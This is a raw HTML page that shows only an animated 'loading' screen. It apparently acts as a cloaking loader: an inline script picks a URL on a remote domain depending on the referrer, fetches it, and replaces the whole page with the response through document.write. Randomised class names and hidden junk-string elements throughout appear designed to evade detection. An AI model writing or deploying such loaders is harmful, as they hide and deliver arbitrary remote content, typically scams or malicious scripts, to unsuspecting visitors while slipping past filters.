<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .I3tju8zfAGo {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .I3tju8zfAGo .WlZ1ZGmB1F {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .I3tju8zfAGo .content {
            line-height: 50px;
            text-align: center
        }

        .I3tju8zfAGo .img {
            width: 100%
        }

        .I3tju8zfAGo .yAER5K14Umu {
            text-align: center
        }

        .I3tju8zfAGo .yAER5K14Umu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .I3tju8zfAGo .yAER5K14Umu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .I3tju8zfAGo .yAER5K14Umu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .I3tju8zfAGo .yAER5K14Umu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .I3tju8zfAGo .yAER5K14Umu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .I3tju8zfAGo .yAER5K14Umu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .I3tju8zfAGo .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FVPjFheC6Mq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VJnUb = FVPjFheC6Mq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VJnUb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VJnUb +".html?a=share";
		}
		
        O9nTxk7TV=url+"#"+new Date().getTime();
        O9nTxk7TV && function() {
            $.get(O9nTxk7TV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >BXtTeXr9nFsecFoGAx5zlqKxiDYycKSTJ4WLdPMakLgUP</ul>
<h1 style='display:none' >itfEWjcFZSxBaxmBOcRJvN</h1>
<h1 style='display:none' >itfEWjcFZSxBaxmBOcRJvN</h1>
<h1 style='display:none' >itfEWjcFZSxBaxmBOcRJvN</h1>
<ul style='display:none' >BXtTeXr9nFsecFoGAx5zlqKxiDYycKSTJ4WLdPMakLgUP</ul>
<ul style='display:none' >BXtTeXr9nFsecFoGAx5zlqKxiDYycKSTJ4WLdPMakLgUP</ul>
<a  href='#' style='display:none'>IhCuOqEwq4aHqwG5uq6SPlu0kk2G8gehj8</a>
<div style='display:none'>PjklhwRXjHSamO8GymM6FNrgiMrfOd0HLN1vA6Qji7CBRuya5ahspeC</div>
<div style='display:none'>PjklhwRXjHSamO8GymM6FNrgiMrfOd0HLN1vA6Qji7CBRuya5ahspeC</div>
<img  src='' style='display:none'><div class="I3tju8zfAGo">
    <div class="WlZ1ZGmB1F">
        <div class="yAER5K14Umu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >LPMhIwUXBNklAbCDr1ArMT7tK6Mrcq6Et7KPqEnAGQ7rzH9BfOrofRFLiusrPa7OJdpcs3vvjoEzfSdzlENLpvBlmmSYSZoz8wwxG</li>
<p  style='display:none'>DHJHIO8mskWBCjxkxIgyck8WiyGJNogwtfH2VaEISrL6mlTLtenAwCquS8SF6T4KwucRMJYSzZG1K5UuPIgO100</p>
<a  href='#' style='display:none'>nxNgk5jRghVRaLlvnt1EmUKq8WIk8gAFWXgKhoIUUfS0GhQl</a></body>
</html>